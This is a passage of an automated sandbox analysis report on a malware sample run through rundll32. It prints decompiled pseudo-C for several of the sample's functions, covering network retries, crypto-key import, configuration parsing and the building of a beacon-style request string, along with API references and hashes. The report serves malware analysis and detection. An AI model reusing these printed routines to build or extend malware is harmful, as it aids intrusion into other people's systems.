				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E02E37571( &_v68) == 0) {
						goto L16;
					}
					_t30 = E02E32C73(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E02E34F4B(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E02E3A000 = E02E3A000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E02E370E7( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x2e3a30c, 0) == 0x102);
				return _t30;
			}

0x02e35d05
0x02e35d0b
0x02e35d12
0x02e35d1a
0x02e35d20
0x02e35d23
0x02e35d25
0x02e35d25
0x02e35d2d
0x02e35d2d
0x02e35d37
0x00000000
0x00000000
0x02e35d46
0x02e35d4a
0x02e35d4e
0x02e35d53
0x02e35d57
0x02e35d93
0x02e35d95
0x02e35d95
0x02e35d59
0x02e35d60
0x02e35d8a
0x02e35d62
0x02e35d62
0x02e35d67
0x02e35d83
0x02e35d69
0x02e35d69
0x02e35d6e
0x02e35d73
0x02e35d76
0x02e35d78
0x02e35d7d
0x02e35d7f
0x02e35d7f
0x02e35d7d
0x02e35d6e
0x02e35d67
0x02e35d60
0x02e35d57
0x02e35da2
0x02e35da7
0x02e35da7
0x02e35dcb

APIs

WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02E35DB7

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: df5880609c9bfea1d7f1a4cb3f42fe8f89a614a4697f7e1c24f27622d37ecfe9
Instruction ID: 292241f0dde4366d9b473969b28d25954e7cd900dbf07e2a2d594fb7fe166292
Opcode Fuzzy Hash: df5880609c9bfea1d7f1a4cb3f42fe8f89a614a4697f7e1c24f27622d37ecfe9
Instruction Fuzzy Hash: FA21A131B8020ADBDB13DE55C84CBAF77A2AB8A35AFD19425E4029B380D770C881CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02E35BB5 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02E35BB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2e3a348; // 0x206d5a8
				_t4 = _t15 + 0x2e3b3a0; // 0x4ea8948
				_t20 = _t4;
				_t6 = _t15 + 0x2e3b124; // 0x650047
				_t17 = E02E34BD5(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02E31D63(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02e35bbf
0x02e35bc6
0x02e35bc7
0x02e35bc8
0x02e35bc9
0x02e35bcf
0x02e35bd4
0x02e35bd4
0x02e35bde
0x02e35bf0
0x02e35bf7
0x02e35c25
0x02e35bf9
0x02e35bfb
0x02e35c00
0x02e35c22
0x02e35c02
0x02e35c05
0x02e35c0c
0x02e35c11
0x02e35c13
0x02e35c13
0x02e35c18
0x02e35c18
0x02e35c00
0x02e35c2c

APIs

Part of subcall function 02E34BD5: SysFreeString.OLEAUT32(?), ref: 02E34CB4

Part of subcall function 02E31D63: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02E36189,004F0053,00000000,?), ref: 02E31D6C
Part of subcall function 02E31D63: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02E36189,004F0053,00000000,?), ref: 02E31D96
Part of subcall function 02E31D63: memset.NTDLL ref: 02E31DAA

SysFreeString.OLEAUT32(00000000), ref: 02E35C18

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 2bfb37d1fa5e53e8ae98ecd01fce39006ebdfbb48f980d9c3dc04b357675d67d
Instruction ID: ccf47e2ffc0bfc0d55ba3e013f44d5037f5a05b4ecc286c21b0c19d8b064dc8c
Opcode Fuzzy Hash: 2bfb37d1fa5e53e8ae98ecd01fce39006ebdfbb48f980d9c3dc04b357675d67d
Instruction Fuzzy Hash: 6001B531580119BFDF129FA4CC08EEEB7B9FB48359F805825F901E7160D3709951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E344D8 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02E344D8(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E02E347E5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E02E37A71(_a8 + _a8);
					if(_t21 != 0) {
						E02E34456(_a4, _t21, _t23);
					}
					E02E3789E(_a4);
				}
				return _t21;
			}

0x02e344e0
0x02e344e7
0x02e344e9
0x02e344f8
0x02e344ff
0x02e3450e
0x02e34512
0x02e34519
0x02e34519
0x02e34521
0x02e34526
0x02e3452b

APIs

lstrlen.KERNEL32(00000000,00000000,02E33831,00000000,?,02E322E5,00000000,02E33831,?,775EC740,02E33831,00000000,04EA9600), ref: 02E344E9

Part of subcall function 02E347E5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02E344FD,00000001,02E33831,00000000), ref: 02E3481D
Part of subcall function 02E347E5: memcpy.NTDLL(02E344FD,02E33831,00000010,?,?,?,02E344FD,00000001,02E33831,00000000,?,02E322E5,00000000,02E33831,?,775EC740), ref: 02E34836
Part of subcall function 02E347E5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02E3485F
Part of subcall function 02E347E5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02E34877
Part of subcall function 02E347E5: memcpy.NTDLL(00000000,775EC740,04EA9600,00000010), ref: 02E348C9

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 186e062f2e8d518c666d29ee72f0566597819708da0afdd246ec23bf9f617f0b
Instruction ID: 1811a44d151b7f4800e61f5ab58ac703a1bd0325d03bb89dbe7e5dd144f04b46
Opcode Fuzzy Hash: 186e062f2e8d518c666d29ee72f0566597819708da0afdd246ec23bf9f617f0b
Instruction Fuzzy Hash: 95F0307758010C7ACF126E95DC08DEA3BAEDF853A6F00C022FD188A010DB31D655DBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02E32792 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02E32792(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x2e3a344; // 0x69b25f44
				if(E02E31696( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x2e3a374 = _v8;
				}
				_t33 =  *0x2e3a344; // 0x69b25f44
				if(E02E31696( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2e3a344; // 0x69b25f44
				_push(_t115);
				if(E02E31696( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2e3a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2e3a344; // 0x69b25f44
						_t45 = E02E32A59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2e3a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2e3a344; // 0x69b25f44
						_t46 = E02E32A59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2e3a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2e3a344; // 0x69b25f44
						_t47 = E02E32A59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2e3a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2e3a344; // 0x69b25f44
						_t48 = E02E32A59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2e3a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2e3a344; // 0x69b25f44
						_t49 = E02E32A59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2e3a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2e3a344; // 0x69b25f44
						_t50 = E02E32A59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2e3a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2e3a344; // 0x69b25f44
								_t51 = E02E32A59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02E318F5(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02E3731D();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2e3a344; // 0x69b25f44
								_t52 = E02E32A59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02E318F5(0, _t52) != 0) {
								_t121 =  *0x2e3a3cc; // 0x4ea9600
								E02E33D80(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2e3a344; // 0x69b25f44
								_t53 = E02E32A59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2e3a348; // 0x206d5a8
								_t22 = _t54 + 0x2e3b252; // 0x616d692f
								 *0x2e3a370 = _t22;
								goto L60;
							} else {
								_t64 = E02E318F5(0, _t53);
								 *0x2e3a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2e3a344; // 0x69b25f44
										_t56 = E02E32A59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x2e3a348; // 0x206d5a8
										_t23 = _t57 + 0x2e3b79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02E318F5(0, _t56);
									}
									 *0x2e3a3e0 = _t58;
									HeapFree( *0x2e3a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x02e32792
0x02e32792
0x02e32792
0x02e32792
0x02e32795
0x02e327b2
0x02e327c0
0x02e327c0
0x02e327c5
0x02e327df
0x02e32a4d
0x02e32a54
0x02e32a58
0x02e32a58
0x02e327e5
0x02e327ea
0x02e32802
0x02e32a3a
0x02e32a44
0x00000000
0x02e32808
0x02e32808
0x02e32809
0x02e3280e
0x02e32824
0x02e32810
0x02e32810
0x02e3281d
0x02e3281d
0x02e32826
0x02e3282f
0x02e32831
0x02e3283b
0x02e32840
0x02e32840
0x02e3283b
0x02e32847
0x02e3285d
0x02e32849
0x02e32849
0x02e32856
0x02e32856
0x02e32861
0x02e32863
0x02e3286d
0x02e32872
0x02e32872
0x02e3286d
0x02e32879
0x02e3288f
0x02e3287b
0x02e3287b
0x02e32888
0x02e32888
0x02e32893
0x02e32895
0x02e3289f
0x02e328a4
0x02e328a4
0x02e3289f
0x02e328ab
0x02e328c1
0x02e328ad
0x02e328ad
0x02e328ba
0x02e328ba
0x02e328c5
0x02e328c7
0x02e328d1
0x02e328d6
0x02e328d6
0x02e328d1
0x02e328dd
0x02e328f3
0x02e328df
0x02e328df
0x02e328ec
0x02e328ec
0x02e328f7
0x02e328f9
0x02e32903
0x02e32908
0x02e32908
0x02e32903
0x02e3290f
0x02e32925
0x02e32911
0x02e32911
0x02e3291e
0x02e3291e
0x02e32929
0x02e3293c
0x02e3293c
0x00000000
0x02e3292b
0x02e3292b
0x02e32935
0x00000000
0x02e32946
0x02e32946
0x02e32948
0x02e3295e
0x02e3294a
0x02e3294a
0x02e32957
0x02e32957
0x02e32962
0x02e32964
0x02e32967
0x02e32968
0x02e3296f
0x02e32971
0x02e32972
0x02e32972
0x02e3296f
0x02e32979
0x02e3298f
0x02e3297b
0x02e3297b
0x02e32988
0x02e32988
0x02e32993
0x02e329a1
0x02e329ab
0x02e329ab
0x02e329b3
0x02e329c9
0x02e329b5
0x02e329b5
0x02e329c2
0x02e329c2
0x02e329cd
0x02e329e0
0x02e329e0
0x02e329e5
0x02e329eb
0x00000000
0x02e329cf
0x02e329d2
0x02e329d7
0x02e329de
0x02e329f0
0x02e329f2
0x02e32a08
0x02e329f4
0x02e329f4
0x02e32a01
0x02e32a01
0x02e32a0c
0x02e32a18
0x02e32a1d
0x02e32a1d
0x02e32a0e
0x02e32a11
0x02e32a11
0x02e32a2b
0x02e32a30
0x02e32a36
0x00000000
0x02e32a39
0x00000000
0x02e329de
0x02e329cd
0x02e32935
0x02e32929

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02E3A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02E32837
StrToIntExA.SHLWAPI(00000000,00000000,?,02E3A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02E32869
StrToIntExA.SHLWAPI(00000000,00000000,?,02E3A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02E3289B
StrToIntExA.SHLWAPI(00000000,00000000,?,02E3A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02E328CD
StrToIntExA.SHLWAPI(00000000,00000000,?,02E3A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02E328FF
StrToIntExA.SHLWAPI(00000000,00000000,?,02E3A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 02E32931
HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 02E32A30
HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 02E32A44

Strings

Uqt, xrefs: 02E32A30, 02E32A44

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: ce706c6069439bb84a216278cc4233529f6b06df51c225da8f580d8dc79e42cf
Instruction ID: fa1c85c0ace4fc4697a8059aa534640f1758d04dcdf2a5ce5d09bff1e7f43250
Opcode Fuzzy Hash: ce706c6069439bb84a216278cc4233529f6b06df51c225da8f580d8dc79e42cf
Instruction Fuzzy Hash: F781B970EC0208ABDB12DBB5DC8CD6F73B9AB48706764AD39AA81D7200E735DD80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E36CA4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E02E36CA4(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x2e3a018; // 0xe8f22e63
				asm("bswap eax");
				_t70 =  *0x2e3a014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x2e3a010; // 0xd8d2f808
				asm("bswap eax");
				_t72 = E02E3A00C; // 0x81762942
				asm("bswap eax");
				_t73 =  *0x2e3a348; // 0x206d5a8
				_t3 = _t73 + 0x2e3b62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d186, _t72, _t71, _t70, _t69,  *0x2e3a02c,  *0x2e3a004, _t68);
				_t76 = E02E31308();
				_t77 =  *0x2e3a348; // 0x206d5a8
				_t4 = _t77 + 0x2e3b66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x2e3a348; // 0x206d5a8
					_t8 = _t148 + 0x2e3b676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x2e3a348; // 0x206d5a8
				_t10 = _t81 + 0x2e3b78e; // 0x4ea8d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x2e3b2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x2e3a36c; // 0x4ea95b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x2e3a348; // 0x206d5a8
					_t16 = _t144 + 0x2e3b889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E02E33DE0(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x2e3a348; // 0x206d5a8
					_t19 = _t139 + 0x2e3b8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x2e3a2d8, 0, _a40);
				}
				_t87 = E02E33ACA();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x2e3a348; // 0x206d5a8
					_t23 = _t135 + 0x2e3b8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x2e3a2d8, 0, _a40);
				}
				_t166 =  *0x2e3a3cc; // 0x4ea9600
				_t89 = E02E34B69(0x2e3a00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x2e3a2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x2e3a2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x2e3a2d8, _t172, _a8);
						goto L30;
					}
					E02E353AE(GetTickCount());
					_t96 =  *0x2e3a3cc; // 0x4ea9600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x2e3a3cc; // 0x4ea9600
					__imp__(_t100 + 0x40);
					_t102 =  *0x2e3a3cc; // 0x4ea9600
					_t168 = E02E32281(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x2e3a2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x2e39280);
					_push(_t168);
					_t108 = E02E36311();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x2e3a2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E02E33D2E( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E02E314C6();
						L26:
						HeapFree( *0x2e3a2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E02E37446(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E02E31335(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E02E3789E(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E02E35F92(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E02E3789E(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x02e36ca4
0x02e36ca4
0x02e36ca8
0x02e36caf
0x02e36cb9
0x02e36cbb
0x02e36cbb
0x02e36cc8
0x02e36cd3
0x02e36cd6
0x02e36ce1
0x02e36ce4
0x02e36ce9
0x02e36cec
0x02e36cf1
0x02e36cf4
0x02e36d00
0x02e36d0d
0x02e36d0f
0x02e36d15
0x02e36d1a
0x02e36d25
0x02e36d27
0x02e36d2a
0x02e36d31
0x02e36d33
0x02e36d3c
0x02e36d47
0x02e36d49
0x02e36d4c
0x02e36d4c
0x02e36d4e
0x02e36d53
0x02e36d53
0x02e36d5b
0x02e36d5f
0x02e36d65
0x02e36d70
0x02e36d72
0x02e36d77
0x02e36d7c
0x02e36d7f
0x02e36d84
0x02e36d8f
0x02e36d91
0x02e36d94
0x02e36d94
0x02e36d96
0x02e36da1
0x02e36da7
0x02e36daa
0x02e36daf
0x02e36dba
0x02e36dbc
0x02e36dc3
0x02e36dcd
0x02e36dcd
0x02e36dcf
0x02e36dd4
0x02e36dda
0x02e36ddd
0x02e36de2
0x02e36dec
0x02e36dee
0x02e36dfd
0x02e36dfd
0x02e36dff
0x02e36e0d
0x02e36e12
0x02e36e14
0x02e36e1a
0x02e36ffa
0x02e37002
0x02e3700f
0x02e36e20
0x02e36e2c
0x02e36e32
0x02e36e38
0x02e36fed
0x02e36ff8
0x00000000
0x02e36ff8
0x02e36e44
0x02e36e49
0x02e36e52
0x02e36e63
0x02e36e67
0x02e36e70
0x02e36e76
0x02e36e83
0x02e36e90
0x02e36e96
0x02e36fe0
0x02e36feb
0x00000000
0x02e36feb
0x02e36ea2
0x02e36ea8
0x02e36ea9
0x02e36eae
0x02e36eb4
0x02e36fd6
0x02e36fde
0x00000000
0x02e36fde
0x02e36ebe
0x02e36ec5
0x02e36ecf
0x02e36ed5
0x02e36edf
0x02e36ef1
0x02e36ef3
0x02e36ef9
0x02e37012
0x02e36fc1
0x02e36fc1
0x02e36fc6
0x02e36fd2
0x02e36fd4
0x00000000
0x02e36fd4
0x02e36f04
0x02e36f09
0x02e36f0f
0x02e36f1a
0x02e36f25
0x02e36f29
0x02e36f2f
0x02e36f35
0x02e36f3b
0x02e36f3e
0x02e36f44
0x02e36f47
0x02e36f4c
0x02e36f50
0x02e36f50
0x02e36f5d
0x02e36f6b
0x02e36f70
0x02e36f72
0x02e36f78
0x02e36f7e
0x02e36f80
0x02e36f85
0x02e36f89
0x02e36fa5
0x02e36fa5
0x02e36f78
0x00000000
0x02e36f5f
0x02e36f64
0x02e36fa7
0x02e36fab
0x02e36fb5
0x00000000
0x00000000
0x00000000
0x00000000
0x02e36fb5
0x02e36f66
0x00000000
0x02e36f66
0x02e36f5d

APIs

GetTickCount.KERNEL32 ref: 02E36CBB
wsprintfA.USER32 ref: 02E36D08
